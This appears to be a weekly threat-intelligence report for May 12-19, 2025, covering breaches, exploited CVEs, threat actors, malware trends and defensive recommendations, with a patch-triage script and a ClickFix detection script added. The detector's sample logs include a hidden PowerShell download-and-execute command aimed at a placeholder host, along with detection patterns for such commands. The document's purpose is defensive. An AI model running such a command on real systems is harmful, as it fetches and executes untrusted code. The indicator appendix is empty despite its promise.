This report provides a concise overview of the cybersecurity threat landscape from May 12th to May 19th, 2025. The period was marked by the continued dominance of ransomware and data extortion groups, a significant number of actively exploited zero-day and critical vulnerabilities, and persistent activity from nation-state and cybercrime actors. AI-driven threats, particularly in social engineering and malware evasion, remain a growing concern. Organizations across all sectors, especially critical infrastructure and those handling sensitive data, faced elevated risks. Proactive patching, enhanced detection capabilities, and robust incident response planning are essential to navigate this complex environment.
2. Current Threat Landscape
The cybersecurity landscape during this reporting period remained highly dynamic and increasingly complex. AI continues to reshape both defensive and offensive capabilities, with threat actors leveraging generative AI for more convincing social engineering attacks, such as sophisticated phishing emails, voice cloning, and deepfake videos. This trend makes traditional detection methods more challenging.
Ransomware and data extortion continue to be prime threats, with a record number of victims posted to data leak sites in the first quarter of 2025. The frequency and sophistication of these attacks are on the rise. Beyond encryption, attackers are increasingly employing double extortion, and triple extortion tactics are anticipated, which may include data destruction or Distributed Denial-of-Service (DDoS) attacks. DDoS attacks themselves remain a formidable threat, capable of overwhelming networks and services.
Supply chain vulnerabilities continue to pose a significant risk, with complexity and lack of visibility into vendor security practices identified as major barriers to cyber resilience. Geopolitical tensions also continue to drive cyber operations, influencing the targeting and tactics of various threat actors. Insider threats, whether malicious or accidental, also contribute to the risk landscape.
3. Notable Security Incidents
The week of May 12th to May 19th saw several significant security incidents reported across various sectors globally. These incidents highlight the diverse range of threats organizations currently face:
Date Reported | Affected Entity | Location | Type of Incident | Threat Actor (if known) | Data Compromised (if known)
May 16, 2025 | Coinbase | Unknown | Data Theft, Extortion Attempt | Unknown | User data
May 15, 2025 | Nucor (Steelmaker) | USA | Cyber Incident (Production Halted) | Unknown | Unknown
May 14, 2025 | Granicus (GovDelivery email system) | Unknown | Compromise | Unknown | Unknown
May 14, 2025 | Central Point School District 6 | Oregon, USA | Cyber Attack | Unknown | Unknown
May 13, 2025 | Empresas Municipales de Cali (Emcali) | Colombia | Cyber Attack (System Shutdown) | Unknown | Unknown
May 12, 2025 | Drug Safety Testing Center | Hong Kong | Ransomware | Unknown | Unknown
May 12, 2025 | Lekardo Clinic | Russia | Cyber Attack | Pro-Ukraine Group | Unknown
May 12, 2025 | Alabama State Government | USA | Cyber Event Investigation | Unknown | Unknown
May 2025 (Disclosed/Reported) | TeleMessage (US Officials’ App) | Unknown | Data Breach | Hacker | Unencrypted message data, names, and contact info
May 2025 (Disclosed/Reported) | SogoTrade, Inc. | USA | Data Breach (Occurred May 2024) | Unknown | Names, financial account numbers, SSNs, tax IDs
May 2025 (Disclosed/Reported) | SAP NetWeaver Users | Global | Exploitation | China-linked APTs, Russian Ransomware Groups | Unknown (Potential system compromise)
May 2025 (Disclosed/Reported) | PowerSchool Users | USA, Canada | Extortion Attempts (Following Dec 2024 Breach) | Hackers | SSNs, medical records, special education info
May 2025 (Disclosed/Reported) | M&S (Marks & Spencer) | UK | Cyber Attack (Operational Disruption) | Scattered Spider (Likely) | Basic contact info, dates of birth, order histories, possibly reference numbers
May 2025 (Reported) | Arla (Dairy Cooperative) | Germany | Cyber Incident | Unknown | Unknown
May 2025 (Reported) | Prismecs (Power Plant Operator) | Switzerland | Email Account Hacked | Unknown | Unknown
May 2025 (Reported) | Berliner Verkehrsbetriebe (BVG) | Germany | Cyber Attack (Service Provider) | Unknown | Unknown
May 2025 (Reported) | Berufsbildende Schule Westerburg | Germany | Cyber Attack | Unknown | Unknown
May 2025 (Reported) | Outwood Academy Acklam | UK | Cyber Attack, Data Breach Warning | Unknown | Unknown
May 2025 (Reported) | Dior | France | Unauthorized Access, Data Breach Disclosure | Unknown | Unknown
4. New Vulnerabilities and Critical CVEs
The week was notable for the release of Microsoft’s May 2025 Patch Tuesday updates on May 13th, which addressed a significant number of vulnerabilities, including several actively exploited zero-days.
Microsoft Patch Tuesday (May 13, 2025): Microsoft released 72-75 patches covering vulnerabilities across Windows, Office, Azure, and other products. Five to seven zero-day vulnerabilities were reported as actively exploited in the wild.
Windows Common Log File System (CLFS) Driver: Two Elevation of Privilege (EoP) zero-days, CVE-2025-32706 and CVE-2025-32701 (CVSS 7.8), were actively exploited. These allow a local authenticated attacker to gain SYSTEM privileges.
Windows Ancillary Function Driver for WinSock: An EoP zero-day, CVE-2025-32709 (CVSS 7.8), was actively exploited, allowing an attacker to gain administrator privileges. Exploitation may involve persuading a user to open a crafted file or visit a malicious website.
Microsoft DWM Core Library: An EoP zero-day, CVE-2025-30400 (CVSS 7.8), was actively exploited, allowing a local attacker to gain SYSTEM privileges.
Microsoft Scripting Engine: A Memory Corruption zero-day, CVE-2025-30397 (CVSS 7.5), was actively exploited. This vulnerability has high attack complexity and requires user interaction (clicking a crafted URL) while running Microsoft Edge in Internet Explorer mode.
Critical RCE Vulnerabilities: Patches included fixes for critical Remote Code Execution flaws in Windows Remote Desktop Services (CVE-2025-29966, CVE-2025-29967 – CVSS 8.8), Microsoft Office (CVE-2025-30377, CVE-2025-30386 – CVSS 8.4), and Windows Virtual Machine Bus (CVE-2025-29833 – CVSS 7.1).
SAP NetWeaver Vulnerabilities: CVE-2025-31324 (Missing Authorization Check, CVSS 9.1) and a related flaw, CVE-2025-42999 (CVSS 9.1), in SAP NetWeaver’s Visual Composer were actively exploited. These vulnerabilities allow unauthenticated file uploads and remote code execution. Exploitation has been attributed to China-linked APTs and Russian ransomware groups. CISA added CVE-2025-42999 to its KEV catalog on May 15th.
Commvault Command Center: CVE-2025-34028 (Path Traversal, CVSS 10.0) in Commvault Command Center (Innovation Release 11.38.0-11.38.19) was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 2nd due to active exploitation. This flaw allows unauthenticated remote attackers to execute arbitrary code.
OttoKit WordPress Plugin: CVE-2025-27007 (Privilege Escalation, CVSS 9.8) affecting OttoKit (formerly SureTriggers) WordPress plugin (versions <= 1.0.82) is under active exploitation. This allows unauthenticated attackers to potentially create administrator accounts. Mass exploitation was observed starting May 4th.
Apple AirPlay: A set of vulnerabilities dubbed “AirBorne,” including CVE-2025-24252 (Use-after-free, CVSS 9.8), CVE-2025-24132 (Buffer Overflow), and CVE-2025-24206 (Authentication Bypass), allow zero-click Remote Code Execution and wormable exploits on devices on the same local network. Apple has released patches for affected devices.
Output Messenger: A zero-day vulnerability, CVE-2025-27920 (Directory Traversal), in the messaging app Output Messenger is being exploited by the Marbled Dust threat actor.
Fortinet Products: A critical zero-day RCE vulnerability, CVE-2025-32756, affecting multiple Fortinet products is being exploited in the wild.
Ivanti EPMM: A vulnerability allowing unauthenticated RCE when chained with another flaw is being exploited in the wild.
Adobe Products: Adobe released 13 updates addressing 39 CVEs, 33 of which are critical, in various products including Photoshop, Animate, InDesign, and others.
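The vulnerability list above is only useful once it is matched against what an organization actually runs and ordered by exploitation evidence rather than CVSS alone. The following Python script, an added example that is not part of this report, performs that triage: it takes the CVE IDs and CVSS scores from section 4, a KEV-style feed (the cveID/dateAdded/dueDate layout mirrors CISA's public KEV JSON, but the dueDate values here are placeholders; only the two dateAdded values are stated in the report) and a constructed asset inventory with constructed product labels, and returns findings ordered KEV-listed first, then other actively exploited CVEs, then the rest by CVSS.

```python
"""Patch-prioritization triage: cross-reference the CVEs named in this report
against a KEV-style feed and an asset inventory.

Added example, not part of the original report. CVE IDs, CVSS scores and the
two KEV addition dates come from the report; the feed layout mirrors the
cveID/dateAdded/dueDate fields of CISA's public KEV JSON, but the dueDate
values, the host inventory and the product labels are constructed.
"""
from dataclasses import dataclass
from datetime import date
from typing import Optional

# CVSS scores as stated in section 4 of the report.
CVSS = {
    "CVE-2025-32706": 7.8, "CVE-2025-32701": 7.8,   # Windows CLFS EoP zero-days
    "CVE-2025-32709": 7.8,                          # Windows AFD for WinSock EoP
    "CVE-2025-30400": 7.8,                          # DWM Core Library EoP
    "CVE-2025-30397": 7.5,                          # Scripting Engine memory corruption
    "CVE-2025-29966": 8.8, "CVE-2025-29967": 8.8,   # Remote Desktop Services RCE
    "CVE-2025-30377": 8.4, "CVE-2025-30386": 8.4,   # Microsoft Office RCE
    "CVE-2025-29833": 7.1,                          # Virtual Machine Bus RCE
    "CVE-2025-31324": 9.1, "CVE-2025-42999": 9.1,   # SAP NetWeaver Visual Composer
    "CVE-2025-34028": 10.0,                         # Commvault Command Center
    "CVE-2025-27007": 9.8,                          # OttoKit WordPress plugin
}

# Product label each CVE maps to (labels are constructed; products per the report).
AFFECTS = {
    "CVE-2025-32706": "windows", "CVE-2025-32701": "windows", "CVE-2025-32709": "windows",
    "CVE-2025-30400": "windows", "CVE-2025-30397": "windows", "CVE-2025-29833": "windows",
    "CVE-2025-29966": "windows-rds", "CVE-2025-29967": "windows-rds",
    "CVE-2025-30377": "office", "CVE-2025-30386": "office",
    "CVE-2025-31324": "sap-netweaver", "CVE-2025-42999": "sap-netweaver",
    "CVE-2025-34028": "commvault-command-center",
    "CVE-2025-27007": "wordpress-ottokit",
}

# Reported as actively exploited in section 4, whether or not KEV-listed.
EXPLOITED = {
    "CVE-2025-32706", "CVE-2025-32701", "CVE-2025-32709", "CVE-2025-30400",
    "CVE-2025-30397", "CVE-2025-31324", "CVE-2025-42999", "CVE-2025-34028",
    "CVE-2025-27007",
}

# KEV-style feed: dateAdded values are from the report; dueDate values are placeholders.
KEV_FEED = [
    {"cveID": "CVE-2025-42999", "dateAdded": "2025-05-15", "dueDate": "2025-06-05"},
    {"cveID": "CVE-2025-34028", "dateAdded": "2025-05-02", "dueDate": "2025-05-23"},
]

# Constructed asset inventory: host -> installed product labels.
INVENTORY = {
    "erp-01": ["sap-netweaver", "windows"],
    "backup-01": ["commvault-command-center", "windows"],
    "ts-01": ["windows", "windows-rds"],
    "www-01": ["wordpress-ottokit"],
    "ws-042": ["windows", "office"],
}


@dataclass(frozen=True)
class Finding:
    host: str
    cve: str
    product: str
    cvss: float
    kev: bool              # listed in the KEV-style feed
    exploited: bool        # reported exploited in the wild
    due: Optional[date]    # KEV remediation due date, if listed


def prioritize(inventory, kev_feed=KEV_FEED, exploited=EXPLOITED,
               cvss=CVSS, affects=AFFECTS):
    """Return findings ordered: KEV-listed (earliest due date first), then other
    actively exploited CVEs, then the rest; within a tier by descending CVSS."""
    due_by_cve = {e["cveID"]: date.fromisoformat(e["dueDate"]) for e in kev_feed}
    findings = []
    for host, products in inventory.items():
        installed = set(products)
        for cve, product in affects.items():
            if product in installed:
                in_kev = cve in due_by_cve
                findings.append(Finding(host, cve, product, cvss[cve], in_kev,
                                        in_kev or cve in exploited, due_by_cve.get(cve)))

    def rank(f):
        tier = 0 if f.kev else 1 if f.exploited else 2
        return (tier, f.due or date.max, -f.cvss, f.host, f.cve)

    return sorted(findings, key=rank)


def kev_due_by(findings, on):
    """Findings whose KEV remediation deadline falls on or before the given date."""
    return [f for f in findings if f.due is not None and f.due <= on]


if __name__ == "__main__":
    ordered = prioritize(INVENTORY)
    for f in ordered:
        tag = "KEV" if f.kev else "EXPLOITED" if f.exploited else "patch"
        print(f"{tag:9} {f.host:10} {f.cve} CVSS {f.cvss:<4} {f.product}")
    print("KEV deadlines by 2025-05-23:",
          [(f.host, f.cve) for f in kev_due_by(ordered, date(2025, 5, 23))])
```

Replacing INVENTORY with a CMDB export and KEV_FEED with the live CISA feed turns this into a daily job; the tiering deliberately puts a KEV-listed CVSS 9.1 ahead of a non-listed CVSS 9.8, because the KEV deadline is the binding constraint.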
5. Threat Actor Activities
Threat actor activity remained high and diverse during the reporting period, encompassing nation-state espionage, financially motivated cybercrime, and politically motivated hacktivism.
Nation-State Actors:
China-linked APTs: Multiple China-based threat groups, including UNC5221, UNC5174, and CL-STA-0048, were observed exploiting vulnerabilities in SAP NetWeaver. U.S. Cyber Command previously discovered Chinese malware implanted on partner networks in Latin America. UNC5174 is noted for its stealth and use of open-source tools.
Iran-linked Lemon Sandstorm: This state-sponsored group (also known as Rubidium, Parisite, Pioneer Kitten, UNC757, Fox Kitten) was attributed to a long-term intrusion into critical national infrastructure in the Middle East, leveraging VPN flaws and custom backdoors.
North Korean Kimsuky: This APT group (also known as Emerald Sleet, Velvet Chollima) continues to be active, employing social engineering, malicious documents, and living-off-the-land tools, often using PowerShell, to gather intelligence related to the Korean peninsula and nuclear policy. They have been observed using ClickFix social engineering tactics.
Russia-linked COLDRIVER: This threat actor was observed distributing the new LOSTKEYS malware, designed for file theft and system information gathering, using ClickFix social engineering lures.
Marbled Dust: Microsoft Threat Intelligence tracks this actor, observed exploiting a zero-day in Output Messenger (CVE-2025-27920) for regional espionage, potentially leveraging DNS hijacking or typo-squatted domains for initial access.
Cybercrime Groups:
Golden Chickens: This financially motivated group (also known as Venom Spider) operates a Malware-as-a-Service (MaaS) platform and has recently developed new credential theft and keylogging tools, TerraStealerV2 and TerraLogger. They supply malware to other prominent groups like FIN6, Cobalt Group, and Evilnum.
Play Ransomware: Actors linked to the Play ransomware family were observed exploiting a Windows zero-day (CVE-2025-29824). Notably, in the observed activity, they deployed the Grixba info stealer instead of ransomware, indicating a potential shift towards data theft and extortion without encryption.
Scattered Spider: This notorious group (also known as Octo Tempest or UNC3944) is believed to be linked to recent cyberattacks causing operational disruption at UK retailers like M&S. They are known for targeting organizations with large quantities of PII and financial data.
BlackLock: This rapidly rising RaaS group, first seen in March 2024, uses custom malware and double extortion tactics, targeting Windows, VMware ESXi, and Linux systems.
DragonForce: This ransomware group is offering a white-label branding service for affiliates.
Hacktivist Groups:
NoName057(16): This pro-Russian group claimed responsibility for DDoS attacks against multiple Romanian government websites on May 4th. They have also targeted Dutch and other European organizations in retaliation for support of Ukraine and previously targeted Italian banks and airports. Their primary tactic is DDoS, often using their tool DDoSia.
6. Malware Spotlights
Several malware families and trends were prominent during this reporting period:
AI-Enhanced Malware: AI is increasingly used by criminals to mutate malicious code in real time to evade detection. The emergence of “agentic AI ransomware,” where AI bots automate and expedite all stages of an attack, is predicted.
Fake Updates and Social Engineering: Malware distributed through malicious or compromised websites often uses fake browser or software update prompts to trick users into downloading payloads. The ClickFix social engineering technique, which manipulates users into executing malicious commands via fake prompts, is also being adopted by various actors, including Interlock and COLDRIVER.
Information Stealers: Lumma Stealer and XWorm continue to be prevalent. Gremlin Stealer, a new C#-based infostealer, is being sold on cybercrime forums and Telegram, designed to exfiltrate browser data, crypto wallets, and credentials. Golden Chickens’ new tools, TerraStealerV2 and TerraLogger, are focused on stealing browser credentials, crypto wallet data, and keylogging. AgeoStealer was observed disguised as a video game.
Remote Access Trojans (RATs): MintsLoader was found dropping the GhostWeaver RAT via phishing attacks. A malicious package in the PyPI repository disguised as Discord contained a fully functional RAT.
Supply Chain Compromises: Malicious npm packages targeting users of the Cursor code editor were discovered, implanting backdoors and stealing credentials. A compromised legitimate npm package, “rand-user-agent,” was found injecting code for a RAT.
Commodity Malware in Sophisticated Campaigns: Established malware families like FakeUpdates, Remcos, AgentTesla, Phorpiex, Rilide, Mirai, Qilin, Akira, and Anubis remain prevalent. Multi-stage campaigns are increasingly blending these commodity tools with advanced tactics like obfuscation and layered execution to evade detection.
Living-Off-The-Land (LotL): Threat actors continue to leverage legitimate system tools and services, including PowerShell and trusted Windows utilities, to blend in and evade detection. LotL phishing, using URLs of legitimate services to host or redirect to malicious content, is also increasing.
7. Recommendations
Given the current threat landscape, MCS recommends the following actions for organizations to enhance their cybersecurity posture:
For Technical Audiences:
Prioritize Patching: Immediately apply patches for critical vulnerabilities, especially those listed in CISA’s KEV catalog or reported as actively exploited, such as the Microsoft Patch Tuesday updates, SAP NetWeaver, Commvault Command Center, OttoKit, Apple AirPlay, Output Messenger, Fortinet, and Ivanti vulnerabilities.
Enhance Endpoint Security: Deploy and configure advanced Endpoint Detection and Response (EDR) or Managed Detection and Response (MDR) solutions capable of detecting and preventing exploit-like behavior, monitoring process activity (including WMI abuse), and identifying unusual file encryption. Implement application whitelisting to restrict unauthorized software execution.
Strengthen Network Defenses: Implement robust firewall rules, Intrusion Detection Systems (IDS), and DNS filtering to block access to known malicious domains and IPs, including those associated with C2 infrastructure and Tor (.onion) sites. Use network segmentation to isolate critical assets and limit lateral movement. Monitor network traffic for unusual outbound communication.
Improve Identity and Access Management: Implement strong access controls and the principle of least privilege for users and applications. Enforce multi-factor authentication (MFA) for all accounts, especially for remote access and privileged users. Consider adopting a Zero Trust architecture.
Secure Email and Collaboration Platforms: Implement advanced threat protection for emails to scan for malicious payloads and links. Disable macros by default in Office documents. Be vigilant about social engineering tactics used in email and collaboration platforms like Microsoft Teams.
Monitor for Living-Off-The-Land (LotL) Techniques: Enhance detection rules to identify the misuse of legitimate system tools and services (e.g., PowerShell, WMI, trusted Windows utilities) for malicious purposes.
Supply Chain Security: Increase visibility and oversight into the security practices of third-party vendors and suppliers. Monitor for compromises in software supply chains, including repositories like npm and PyPI.
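The ClickFix lures in section 6 and the LotL monitoring recommendation above share one observable: a shell (PowerShell or cmd.exe) started by a parent that rarely needs one, such as explorer.exe via the Run dialog, an Office application or a browser, with a command line carrying hidden-window, policy-bypass, encoded or download-and-evaluate switches. The following Python script is an added example, not part of this report: it scores constructed JSON-lines events that mimic Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, User, Computer) with rules and a threshold that are this example's own choices, and returns the events worth an analyst's attention while leaving an administrator's scripted PowerShell run alone.

```python
"""Flag ClickFix-style living-off-the-land shell launches in process-creation logs.

Added example, not part of the original report. SAMPLE_EVENTS are constructed
JSON lines shaped like Sysmon Event ID 1 fields; the scoring rules, weights and
threshold are this example's own choices, not a published detection rule.
"""
import json
import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Parents that rarely need to spawn a shell: the Run dialog (explorer.exe),
# script hosts, Office applications and browsers, the launch points the
# report's ClickFix and fake-update lures rely on.
SUSPICIOUS_PARENTS = {
    "explorer.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "winword.exe", "excel.exe", "outlook.exe",
    "msedge.exe", "chrome.exe", "firefox.exe",
}

# (regex applied to the lower-cased command line, weight, label)
CMDLINE_RULES = [
    (r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", 1, "hidden window"),
    (r"(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass\b", 1, "execution policy bypass"),
    (r"(?:^|\s)-nop(?:rofile)?\b", 1, "profile suppressed"),
    (r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\b", 2, "encoded command"),
    (r"\b(?:iex|invoke-expression)\b", 2, "invoke-expression"),
    (r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", 1, "web fetch"),
    (r"https?://", 1, "url in command line"),
]

# Constructed sample events. The first two are benign (a scheduled inventory
# script, an interactive shell); the last two match the lure patterns above.
SAMPLE_EVENTS = r"""
{"Computer": "srv-backup-01", "User": "CORP\\svc_backup", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"}
{"Computer": "ws-017", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
{"Computer": "ws-042", "User": "CORP\\asmith", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -nop -c \"iex (irm https://updates.placeholder.invalid/verify)\""}
{"Computer": "ws-088", "User": "CORP\\blee", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -ep bypass -enc <CONSTRUCTED_BASE64>"}
"""


def basename(path):
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Parse JSON-lines text into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def score(event):
    """Return (points, reasons) for one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    points, reasons = 0, []
    if image in SHELLS and parent in SUSPICIOUS_PARENTS:
        points += 2
        reasons.append(f"{image} spawned by {parent}")
    # Command-line rules only matter when a shell is involved somewhere.
    if image in SHELLS or "powershell" in cmd:
        for pattern, weight, label in CMDLINE_RULES:
            if re.search(pattern, cmd):
                points += weight
                reasons.append(label)
    return points, reasons


def detect(text, threshold=4):
    """Return alert dicts for events scoring at or above the threshold."""
    alerts = []
    for ev in parse_events(text):
        points, reasons = score(ev)
        if points >= threshold:
            alerts.append({"host": ev.get("Computer"), "user": ev.get("User"),
                           "score": points, "reasons": reasons,
                           "command": ev.get("CommandLine")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['score']}] {alert['host']} {alert['user']}: "
              f"{', '.join(alert['reasons'])}\n    {alert['command']}")
```

The interactive shell from explorer.exe scores 2 and stays below the threshold, which is the point of weighting the parent/child pair rather than alerting on it alone; tune the weights against your own baseline before promoting this to a production rule.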
For Non-Technical Audiences:
Security Awareness Training: Regularly train employees on recognizing and reporting phishing attempts, social engineering tactics (including fake updates and ClickFix lures), and suspicious communications. Emphasize the risks associated with clicking on links or downloading attachments from unknown sources.
Be Skeptical of Urgent Requests: Educate staff to verify urgent requests for information or action, especially those involving financial transfers or credential disclosure, through alternative communication channels, even if they appear to come from trusted sources or executives (BEC, deepfakes).
Use Strong, Unique Passwords and MFA: Encourage the use of strong, unique passwords for all accounts and enable multi-factor authentication whenever possible.
Report Suspicious Activity: Establish clear procedures for reporting any suspicious emails, system behavior, or potential security incidents to the IT or security team promptly.
Understand Data Sensitivity: Ensure employees understand the importance of protecting sensitive data and the potential consequences of data breaches.
General Recommendations:
Maintain and Test Backups: Regularly back up critical data and systems, store backups offsite and offline, and regularly test the restoration process to ensure business continuity in the event of a ransomware attack or data loss.
Develop and Practice Incident Response Plan: Have a well-defined and tested incident response plan in place to guide actions during a cyberattack, including roles, responsibilities, communication procedures, and containment strategies.
Stay Informed: Monitor reputable threat intelligence sources (like CISA, MS-ISAC, and industry-specific advisories) to stay updated on the latest threats, vulnerabilities, and mitigation strategies.
8. Analyst Notes
The observed trends this week underscore the increasing sophistication and adaptability of threat actors. The predicted rise of “agentic AI ransomware” highlights a potential future where attacks could become even faster and more autonomous. The continued use of fake victim claims by some ransomware groups complicates threat intelligence efforts and attribution. While zero-day exploitation remains a concern, the slight decline observed in some reports suggests that improved vendor security practices may be having some positive impact. However, the sheer volume and diversity of threats, coupled with the increasing cross-collaboration among different threat actor types, mean that organizations cannot afford to become complacent. The focus on less technical social engineering attacks targeting individuals, even high-value ones, demonstrates that the human element remains a critical vulnerability. The decrease in overall ransomware payments despite an increase in incidents suggests a growing reluctance among victims to pay, potentially influenced by poor decryptor quality and the risk of data leaks even after payment. Experts continue to strongly advise against paying ransoms.
9. Threat Indicator Appendix
This appendix provides a list of observed Indicators of Compromise (IOCs) related to threats discussed in this report. Security teams should use these indicators to enhance their detection and prevention capabilities.
Note on Sources and Intelligence: This report synthesizes information from various credible sources, including public advisories from organizations like CISA, MITRE, and MS-ISAC, alongside internal analysis and emerging threat intelligence. Efforts have been made to differentiate between confirmed intelligence and speculative or unverified information to maintain accuracy and credibility.